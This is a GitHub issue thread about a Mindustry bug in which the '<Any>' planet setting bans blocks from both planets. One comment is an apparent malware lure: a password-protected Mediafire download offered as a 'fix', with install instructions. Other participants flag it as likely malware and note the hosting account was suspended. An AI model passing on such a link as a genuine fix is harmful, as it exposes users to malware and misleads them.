### ISSUE TITLE
<Any> option bans stuff from both planets

### ISSUE THREAD

**Issue by jehosula** [Anuken/Mindustry#10155]
### Platforms

Windows

### Build

25212

### Issue

when selecting the <Any> setting it BANS blocks from all planets instead of enabling both

### Steps to reproduce

set the planet to <Any> in a map and start a game, only blocks available in sandbox can be used

### Mods used

none

### Save file

[but map save.zip](https://github.com/user-attachments/files/16755994/but.map.save.zip)

(zipped map file so it uploads)

### (Crash) logs

not a crash

### Submission

- [X] I have updated to the latest release (https://github.com/Anuken/Mindustry/releases) to make sure my issue has not been fixed.
- [X] I have searched the closed and open issues to make sure that this problem has not already been reported.
- [X] I am not using Foo's Client, and have made sure the bug is not caused by mods I have installed.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jehosula** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

this looks pretty sus, and also it's a bug with the main game, it's not like some random sus download fixes much

**Comment by camelStyleUser** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

is that a jia tan reference

**Comment by camelStyleUser** [comment]
> > to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/[REDACTED] password: changeme when you installing, you need to place a check in install to path and select "gcc."
> 
> this looks pretty sus, and also it's a bug with the main game, it's not like some random sus download fixes much

it could technically patch the jar(which please provide the source code patch then) but this is most likely malware

**Comment by broganeuquoixe** [comment]
> The resource you are trying access belongs to an account that has been suspended. 

I'm gonna take a guess and say that it was the same thing as with #10151, if so, yes it's malware, don't run it.
Github needs to fix their email
